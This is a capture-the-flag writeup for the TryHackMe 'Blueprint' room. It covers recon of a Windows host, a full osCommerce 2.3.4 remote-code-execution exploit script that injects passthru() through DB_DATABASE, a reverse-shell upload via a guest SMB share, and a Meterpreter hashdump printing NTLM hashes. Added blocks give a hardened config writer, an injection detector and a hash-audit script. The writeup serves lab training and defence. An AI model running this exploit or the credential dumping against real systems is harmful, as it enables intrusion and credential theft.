Blueprint - THM
This is the writeup for the TryHackMe easy difficulty room called Blueprint.

This is going to be an exploitable Windows machine.
Recon
CMD: nmap -sT -sV -F $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-28 12:27 CET
Nmap scan report for 10.10.179.32
Host is up (0.12s latency).
Not shown: 90 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

Among the open ports, the Apache web server on port 8080 and the Windows SMB service on port 445 are the interesting ones.
CMD: smbmap -H $IP -u guest -r
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.179.32:445 Name: 10.10.179.32 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
Users READ ONLY
./Users
dw--w--w-- 0 Fri Apr 12 00:36:40 2019 .
dw--w--w-- 0 Fri Apr 12 00:36:40 2019 ..
dw--w--w-- 0 Sun Jan 15 23:38:59 2017 Default
fr--r--r-- 174 Sun Jan 15 23:28:56 2017 desktop.ini
dw--w--w-- 0 Tue Oct 28 12:40:14 2025 Public
Windows NO ACCESS
[*] Closed 1 connections

Running smbmap as guest we see that the Users share is readable, and the listing marks the directories Public and Default as writable.

The website on port 8080 is an osCommerce 2.3.4 installation.
Exploitation

Exploit DB gives us several possible exploits for this version.
We are going to use the first one.
import requests
import sys

if(len(sys.argv) != 2):
    print("please specify the osCommerce url")
    print("format: python3 osCommerce2_3_4RCE.py <url>")
    print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
    sys.exit(0)

baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'

def rce(command):
    # targeting the finish step, which is step 4
    targetUrl = baseUrl + '/install/install.php?step=4'
    payload = "');"
    payload += "passthru('" + command + "');"  # injecting the system command here
    payload += "/*"
    # injected parameters
    data = {
        'DIR_FS_DOCUMENT_ROOT': './',
        'DB_DATABASE': payload
    }
    response = requests.post(targetUrl, data=data)
    if(response.status_code == 200):
        #print('[*] Successfully injected payload to config file')
        readCMDUrl = baseUrl + '/install/includes/configure.php'
        cmd = requests.get(readCMDUrl)
        commandRsl = cmd.text.split('\n')
        if(cmd.status_code == 200):
            #print('[*] System Command Execution Completed')
            # skipping the PHP error message at the top of the response
            for i in range(2, len(commandRsl)):
                print(commandRsl[i])
        else:
            return '[!] Configure.php not found'
    else:
        return '[!] Fail to inject payload'

# testing for the vulnerability by accessing the install directory
test = requests.get(testVulnUrl)
# checking whether the install directory still exists and is accessible
if(test.status_code == 200):
    print('[*] Install directory still available, the host likely vulnerable to the exploit.')
    # testing system command injection
    print('[*] Testing injecting system command to test vulnerability')
    cmd = 'whoami'
    print('User: ', end='')
    err = rce(cmd)
    if(err is not None):
        print(err)
        sys.exit(0)
    while(True):
        cmd = input('RCE_SHELL$ ')
        err = rce(cmd)
        if(err is not None):
            print(err)
            sys.exit(0)
else:
    print('[!] Install directory not found, the host is not vulnerable')
    sys.exit(0)

Running the python script we can run any command as NT AUTHORITY\SYSTEM.
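Why the DB_DATABASE payload works, as an added example that is not part of the writeup or of osCommerce: a minimal model of an installer writing submitted values into configure.php by string substitution, beside a hardened writer that only accepts an identifier, plus a check that flags command-execution calls in an existing configure.php. The template, the function names and the identifier rule are assumptions.

```python
import re

# Assumed minimal stand-in for the define() lines osCommerce's installer writes.
TEMPLATE = "<?php\ndefine('DB_DATABASE', '{db}');\ndefine('DIR_FS_DOCUMENT_ROOT', '{root}');\n"

# Command-execution functions that never belong in a configuration file.
DANGEROUS = re.compile(r"\b(passthru|system|exec|shell_exec|popen|proc_open)\s*\(")


def render_vulnerable(db_database, doc_root="./"):
    """Writes the submitted value into PHP source verbatim: a quote in the
    value ends the string literal and the rest is parsed as PHP code."""
    return TEMPLATE.format(db=db_database, root=doc_root)


def render_hardened(db_database, doc_root="./"):
    """Accepts only a MySQL-style identifier, so quotes, semicolons and
    comment markers can never reach the generated PHP."""
    if not re.fullmatch(r"[A-Za-z0-9_]{1,64}", db_database):
        raise ValueError("DB_DATABASE must be an identifier, got %r" % db_database)
    return TEMPLATE.format(db=db_database, root=doc_root)


def is_rejected(db_database):
    """True when the hardened writer refuses the value."""
    try:
        render_hardened(db_database)
    except ValueError:
        return True
    return False


def find_injected_code(configure_php):
    """Defensive check for an existing configure.php: returns the lines that
    call a command-execution function."""
    return [line for line in configure_php.splitlines() if DANGEROUS.search(line)]


# Constructed payload in the same shape as the one the script on this page builds.
PAYLOAD = "');" + "passthru('whoami');" + "/*"

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print("flagged:", find_injected_code(render_vulnerable(PAYLOAD)))
    print("hardened rejects payload:", is_rejected(PAYLOAD))
```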
CMD: python osCommerce2_3_4RCE.py http://$IP:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$

Using the previously discovered SMB share we can upload a reverse shell and run it with SYSTEM privileges.
CMD: smbclient //$IP/Users --user guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> cd Public
smb: \Public\> put rev.exe
putting file rev.exe as \Public\rev.exe (51.8 kb/s) (average 51.8 kb/s)

Executing rev.exe through the RCE_SHELL prompt of the python script, we get our reverse shell back.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

Meterpreter's hashdump command dumps the local NTLM hashes by default.
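A credential-audit check, added here and not part of the writeup, that parses pwdump-format lines like the hashdump output above and flags blank passwords (NT hash of the empty string), stored LM hashes, and accounts sharing one NT hash. The three sample lines are the dump above; the function names are assumptions.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# The three lines from the hashdump above, used as sample input.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
"""


def parse_pwdump(text):
    """Returns (user, rid, lm_hash, nt_hash) tuples; rejects malformed lines."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE.match(line.strip())
        if not m:
            raise ValueError("not a pwdump line: %r" % line)
        user, rid, lm, nt = m.groups()
        records.append((user, int(rid), lm.lower(), nt.lower()))
    return records


def audit(text):
    """Maps each account that has a finding to its list of findings."""
    records = parse_pwdump(text)
    by_nt = defaultdict(list)  # NT hash -> accounts using it (password reuse)
    for user, _, _, nt in records:
        by_nt[nt].append(user)
    findings = {}
    for user, rid, lm, nt in records:
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            issues.append("LM hash stored")
        if len(by_nt[nt]) > 1:
            issues.append("password shared with " + ", ".join(u for u in by_nt[nt] if u != user))
        if issues:
            findings[user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit(SAMPLE).items():
        print(user, "->", "; ".join(issues))
```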

We can also get the ROOT FLAG in the directory C:\Users\Administrator\.
